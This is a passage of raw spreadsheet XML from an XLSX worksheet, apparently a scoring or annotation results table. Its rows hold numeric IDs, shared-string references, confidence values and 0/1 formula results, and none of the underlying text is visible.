        <v>1</v>
      </c>
      <c r="K55" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L55" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O55" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="62">
        <v>7243.0</v>
      </c>
      <c r="B56" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C56" s="63" t="s">
        <v>327</v>
      </c>
      <c r="D56" s="62" t="s">
        <v>328</v>
      </c>
      <c r="E56" s="62" t="s">
        <v>329</v>
      </c>
      <c r="F56" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G56" s="62">
        <v>0.95</v>
      </c>
      <c r="H56" s="64">
        <v>1.0</v>
      </c>
      <c r="I56" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J56" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K56" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L56" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O56" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="62">
        <v>7264.0</v>
      </c>
      <c r="B57" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C57" s="63" t="s">
        <v>330</v>
      </c>
      <c r="D57" s="62" t="s">
        <v>331</v>
      </c>
      <c r="E57" s="62" t="s">
        <v>332</v>
      </c>
      <c r="F57" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G57" s="62">
        <v>0.9</v>
      </c>
      <c r="H57" s="64">
        <v>1.0</v>
      </c>
      <c r="I57" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J57" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K57" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L57" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O57" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="62">
        <v>7665.0</v>
      </c>
      <c r="B58" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C58" s="63" t="s">
        <v>333</v>
      </c>
      <c r="D58" s="62" t="s">
        <v>334</v>
      </c>
      <c r="E58" s="62" t="s">
        <v>335</v>
      </c>
      <c r="F58" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G58" s="62">
        <v>0.9</v>
      </c>
      <c r="H58" s="64">
        <v>1.0</v>
      </c>
      <c r="I58" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J58" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K58" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L58" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O58" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="62">
        <v>7798.0</v>
      </c>
      <c r="B59" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C59" s="63" t="s">
        <v>336</v>
      </c>
      <c r="D59" s="62" t="s">
        <v>337</v>
      </c>
      <c r="E59" s="62" t="s">
        <v>338</v>
      </c>
      <c r="F59" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G59" s="62">
        <v>0.9</v>
      </c>
      <c r="H59" s="64">
        <v>1.0</v>
      </c>
      <c r="I59" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J59" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K59" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L59" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O59" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="62">
        <v>8202.0</v>
      </c>
      <c r="B60" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C60" s="63" t="s">
        <v>339</v>
      </c>
      <c r="D60" s="62" t="s">
        <v>340</v>
      </c>
      <c r="E60" s="62" t="s">
        <v>341</v>
      </c>
      <c r="F60" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G60" s="62">
        <v>0.9</v>
      </c>
      <c r="H60" s="64">
        <v>1.0</v>
      </c>
      <c r="I60" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J60" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K60" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L60" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O60" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="62">
        <v>8305.0</v>
      </c>
      <c r="B61" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C61" s="63" t="s">
        <v>342</v>
      </c>
      <c r="D61" s="62" t="s">
        <v>343</v>
      </c>
      <c r="E61" s="62" t="s">
        <v>344</v>
      </c>
      <c r="F61" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G61" s="62">
        <v>0.95</v>
      </c>
      <c r="H61" s="64">
        <v>1.0</v>
      </c>
      <c r="I61" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J61" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K61" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L61" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O61" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="62">
        <v>8641.0</v>
      </c>
      <c r="B62" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C62" s="63" t="s">
        <v>345</v>
      </c>
      <c r="D62" s="62" t="s">
        <v>346</v>
      </c>
      <c r="E62" s="62" t="s">
        <v>347</v>
      </c>
      <c r="F62" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G62" s="62">
        <v>0.95</v>
      </c>
      <c r="H62" s="64">
        <v>1.0</v>
      </c>
      <c r="I62" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J62" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K62" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L62" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O62" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="62">
        <v>8777.0</v>
      </c>
      <c r="B63" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C63" s="63" t="s">
        <v>348</v>
      </c>
      <c r="D63" s="62" t="s">
        <v>349</v>
      </c>
      <c r="E63" s="62" t="s">
        <v>350</v>
      </c>
      <c r="F63" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G63" s="62">
        <v>0.9</v>
      </c>
      <c r="H63" s="64">
        <v>1.0</v>
      </c>
      <c r="I63" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J63" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K63" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L63" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O63" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="62">
        <v>8838.0</v>
      </c>
      <c r="B64" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C64" s="63" t="s">
        <v>351</v>
      </c>
      <c r="D64" s="62" t="s">
        <v>352</v>
      </c>
      <c r="E64" s="62" t="s">
        <v>353</v>
      </c>
      <c r="F64" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G64" s="62">
        <v>0.9</v>
      </c>
      <c r="H64" s="64">
        <v>1.0</v>
      </c>
      <c r="I64" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J64" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K64" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L64" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O64" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="62">
        <v>9176.0</v>
      </c>
      <c r="B65" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C65" s="63" t="s">
        <v>354</v>
      </c>
      <c r="D65" s="62" t="s">
        <v>355</v>
      </c>
      <c r="E65" s="62" t="s">
        <v>356</v>
      </c>
      <c r="F65" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G65" s="62">
        <v>0.9</v>
      </c>
      <c r="H65" s="64">
        <v>0.0</v>
      </c>
      <c r="I65" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J65" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K65" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L65" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O65" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="62">
        <v>9222.0</v>
      </c>
      <c r="B66" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C66" s="63" t="s">
        <v>357</v>
      </c>
      <c r="D66" s="62" t="s">
        <v>358</v>
      </c>
      <c r="E66" s="62" t="s">
        <v>359</v>
      </c>
      <c r="F66" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G66" s="62">
        <v>0.95</v>
      </c>
      <c r="H66" s="64">
        <v>1.0</v>
      </c>
      <c r="I66" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J66" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K66" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L66" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O66" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="62">
        <v>9373.0</v>
      </c>
      <c r="B67" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C67" s="63" t="s">
        <v>360</v>
      </c>
      <c r="D67" s="62" t="s">
        <v>361</v>
      </c>
      <c r="E67" s="62" t="s">
        <v>362</v>
      </c>
      <c r="F67" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G67" s="62">
        <v>0.9</v>
      </c>
      <c r="H67" s="64">
        <v>0.0</v>
      </c>
      <c r="I67" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J67" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K67" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L67" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O67" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="62">
        <v>9441.0</v>
      </c>
      <c r="B68" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C68" s="63" t="s">
        <v>363</v>
      </c>
      <c r="D68" s="62" t="s">
        <v>364</v>
      </c>
      <c r="E68" s="62" t="s">
        <v>365</v>
      </c>
      <c r="F68" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G68" s="62">
        <v>0.9</v>
      </c>
      <c r="H68" s="64">
        <v>1.0</v>
      </c>
      <c r="I68" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J68" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K68" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L68" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O68" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="62">
        <v>9472.0</v>
      </c>
      <c r="B69" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C69" s="63" t="s">
        <v>366</v>
      </c>
      <c r="D69" s="62" t="s">
        <v>367</v>
      </c>
      <c r="E69" s="62" t="s">
        <v>368</v>
      </c>
      <c r="F69" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G69" s="62">
        <v>0.9</v>
      </c>
      <c r="H69" s="64">
        <v>1.0</v>
      </c>
      <c r="I69" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J69" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K69" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L69" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O69" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="62">
        <v>9669.0</v>
      </c>
      <c r="B70" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C70" s="63" t="s">
        <v>369</v>
      </c>
      <c r="D70" s="62" t="s">
        <v>370</v>
      </c>
      <c r="E70" s="62" t="s">
        <v>371</v>
      </c>
      <c r="F70" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G70" s="62">
        <v>0.9</v>
      </c>
      <c r="H70" s="64">
        <v>0.0</v>
      </c>
      <c r="I70" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J70" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K70" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L70" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O70" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="62">
        <v>9772.0</v>
      </c>
      <c r="B71" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C71" s="63" t="s">
        <v>372</v>
      </c>
      <c r="D71" s="62" t="s">
        <v>373</v>
      </c>
      <c r="E71" s="62" t="s">
        <v>374</v>
      </c>
      <c r="F71" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G71" s="62">
        <v>0.9</v>
      </c>
      <c r="H71" s="64">
        <v>1.0</v>
      </c>
      <c r="I71" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J71" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K71" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L71" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M71" s="62" t="s">
        <v>375</v>
      </c>
      <c r="N71" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O71" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="62">
        <v>9905.0</v>
      </c>
      <c r="B72" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C72" s="63" t="s">
        <v>376</v>
      </c>
      <c r="D72" s="62" t="s">
        <v>377</v>
      </c>
      <c r="E72" s="62" t="s">
        <v>378</v>
      </c>
      <c r="F72" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G72" s="62">
        <v>0.9</v>
      </c>
      <c r="H72" s="64">
        <v>0.0</v>
      </c>
      <c r="I72" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J72" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K72" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L72" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O72" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="62">
        <v>10008.0</v>
      </c>
      <c r="B73" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C73" s="63" t="s">
        <v>379</v>
      </c>
      <c r="D73" s="62" t="s">
        <v>380</v>
      </c>
      <c r="E73" s="62" t="s">
        <v>381</v>
      </c>
      <c r="F73" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G73" s="62">
        <v>0.95</v>
      </c>
      <c r="H73" s="64">
        <v>1.0</v>
      </c>
      <c r="I73" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J73" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K73" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L73" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M73" s="62" t="s">
        <v>382</v>
      </c>
      <c r="N73" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O73" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="62">
        <v>10118.0</v>
      </c>
      <c r="B74" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C74" s="63" t="s">
        <v>383</v>
      </c>
      <c r="D74" s="62" t="s">
        <v>384</v>
      </c>
      <c r="E74" s="62" t="s">
        <v>385</v>
      </c>
      <c r="F74" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G74" s="62">
        <v>0.9</v>
      </c>
      <c r="H74" s="64">
        <v>0.0</v>
      </c>
      <c r="I74" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J74" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K74" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L74" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O74" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="62">
        <v>10123.0</v>
      </c>
      <c r="B75" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C75" s="63" t="s">
        <v>386</v>
      </c>
      <c r="D75" s="62" t="s">
        <v>387</v>
      </c>
      <c r="E75" s="62" t="s">
        <v>388</v>
      </c>
      <c r="F75" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G75" s="62">
        <v>0.8</v>
      </c>
      <c r="H75" s="64">
        <v>0.0</v>
      </c>
      <c r="I75" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J75" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K75" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L75" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M75" s="62" t="s">
        <v>389</v>
      </c>
      <c r="N75" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O75" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="62">
        <v>10152.0</v>
      </c>
      <c r="B76" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C76" s="63" t="s">
        <v>390</v>
      </c>
      <c r="D76" s="62" t="s">
        <v>391</v>
      </c>
      <c r="E76" s="62" t="s">
        <v>392</v>
      </c>
      <c r="F76" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G76" s="62">
        <v>0.8</v>
      </c>
      <c r="H76" s="64">
        <v>0.0</v>
      </c>
      <c r="I76" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J76" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K76" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L76" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O76" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="62">
        <v>10383.0</v>
      </c>
      <c r="B77" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C77" s="63" t="s">
        <v>393</v>
      </c>
      <c r="D77" s="62" t="s">
        <v>394</v>
      </c>
      <c r="E77" s="62" t="s">
        <v>395</v>
      </c>
      <c r="F77" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G77" s="62">
        <v>0.85</v>
      </c>
      <c r="H77" s="64">
        <v>1.0</v>
      </c>
      <c r="I77" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J77" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K77" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L77" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O77" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="62">
        <v>10681.0</v>
      </c>
      <c r="B78" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C78" s="63" t="s">
        <v>396</v>
      </c>
      <c r="D78" s="62" t="s">
        <v>397</v>
      </c>
      <c r="E78" s="62" t="s">
        <v>398</v>
      </c>
      <c r="F78" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G78" s="62">
        <v>0.85</v>
      </c>
      <c r="H78" s="64">
        <v>1.0</v>
      </c>
      <c r="I78" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J78" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K78" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L78" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O78" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="62">
        <v>10879.0</v>
      </c>
      <c r="B79" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C79" s="63" t="s">
        <v>399</v>
      </c>
      <c r="D79" s="62" t="s">
        <v>400</v>
      </c>
      <c r="E79" s="62" t="s">
        <v>401</v>
      </c>
      <c r="F79" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G79" s="62">
        <v>0.9</v>
      </c>
      <c r="H79" s="64">
        <v>1.0</v>
      </c>
      <c r="I79" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J79" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K79" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L79" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O79" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="62">
        <v>11017.0</v>
      </c>
      <c r="B80" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C80" s="63" t="s">
        <v>402</v>
      </c>
      <c r="D80" s="62" t="s">
        <v>403</v>
      </c>
      <c r="E80" s="62" t="s">
        <v>404</v>
      </c>
      <c r="F80" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G80" s="62">
        <v>0.95</v>
      </c>
      <c r="H80" s="64">
        <v>1.0</v>
      </c>
      <c r="I80" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J80" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K80" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L80" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O80" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="62">
        <v>11130.0</v>
      </c>
      <c r="B81" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C81" s="63" t="s">
        <v>405</v>
      </c>
      <c r="D81" s="62" t="s">
        <v>406</v>
      </c>
      <c r="E81" s="62" t="s">
        <v>407</v>
      </c>
      <c r="F81" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G81" s="62">
        <v>0.9</v>
      </c>
      <c r="H81" s="64">
        <v>1.0</v>
      </c>
      <c r="I81" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J81" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K81" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L81" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O81" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="62">
        <v>11229.0</v>
      </c>
      <c r="B82" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C82" s="63" t="s">
        <v>408</v>
      </c>
      <c r="D82" s="62" t="s">
        <v>409</v>
      </c>
      <c r="E82" s="62" t="s">
        <v>410</v>
      </c>
      <c r="F82" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G82" s="62">
        <v>0.85</v>
      </c>
      <c r="H82" s="64">
        <v>0.0</v>
      </c>
      <c r="I82" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J82" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K82" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L82" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O82" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="62">
        <v>11350.0</v>
      </c>
      <c r="B83" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C83" s="63" t="s">
        <v>411</v>
      </c>
      <c r="D83" s="62" t="s">
        <v>412</v>
      </c>
      <c r="E83" s="62" t="s">
        <v>413</v>
      </c>
      <c r="F83" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G83" s="62">
        <v>0.9</v>
      </c>
      <c r="H83" s="64">
        <v>0.0</v>
      </c>
      <c r="I83" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J83" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K83" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L83" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O83" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="62">
        <v>11442.0</v>
      </c>
      <c r="B84" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C84" s="63" t="s">
        <v>414</v>
      </c>
      <c r="D84" s="62" t="s">
        <v>415</v>
      </c>
      <c r="E84" s="62" t="s">
        <v>416</v>
      </c>
      <c r="F84" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G84" s="62">
        <v>0.9</v>
      </c>
      <c r="H84" s="64">
        <v>0.0</v>
      </c>
      <c r="I84" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J84" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K84" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L84" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O84" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="62">
        <v>11452.0</v>
      </c>
      <c r="B85" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C85" s="63" t="s">
        <v>417</v>
      </c>
      <c r="D85" s="62" t="s">
        <v>418</v>
      </c>
      <c r="E85" s="62" t="s">
        <v>419</v>
      </c>
      <c r="F85" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G85" s="62">
        <v>0.9</v>
      </c>
      <c r="H85" s="64">
        <v>0.0</v>
      </c>
      <c r="I85" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J85" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K85" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L85" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O85" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="62">
        <v>11505.0</v>
      </c>
      <c r="B86" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C86" s="63" t="s">
        <v>420</v>
      </c>
      <c r="D86" s="62" t="s">
        <v>421</v>
      </c>
      <c r="E86" s="62" t="s">
        <v>422</v>
      </c>
      <c r="F86" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G86" s="62">
        <v>0.9</v>
      </c>
      <c r="H86" s="64">
        <v>0.0</v>
      </c>
      <c r="I86" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J86" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K86" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L86" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O86" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="62">
        <v>11523.0</v>
      </c>
      <c r="B87" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C87" s="63" t="s">
        <v>423</v>
      </c>
      <c r="D87" s="62" t="s">
        <v>424</v>
      </c>
      <c r="E87" s="62" t="s">
        <v>425</v>
      </c>
      <c r="F87" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G87" s="62">
        <v>0.9</v>
      </c>
      <c r="H87" s="64">
        <v>1.0</v>
      </c>
      <c r="I87" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J87" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K87" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L87" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O87" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="62">
        <v>11622.0</v>
      </c>
      <c r="B88" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C88" s="63" t="s">
        <v>426</v>
      </c>
      <c r="D88" s="62" t="s">
        <v>427</v>
      </c>
      <c r="E88" s="62" t="s">
        <v>428</v>
      </c>
      <c r="F88" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G88" s="62">
        <v>0.9</v>
      </c>
      <c r="H88" s="64">
        <v>1.0</v>
      </c>
      <c r="I88" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J88" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K88" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L88" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O88" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="62">
        <v>12046.0</v>
      </c>
      <c r="B89" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C89" s="63" t="s">
        <v>429</v>
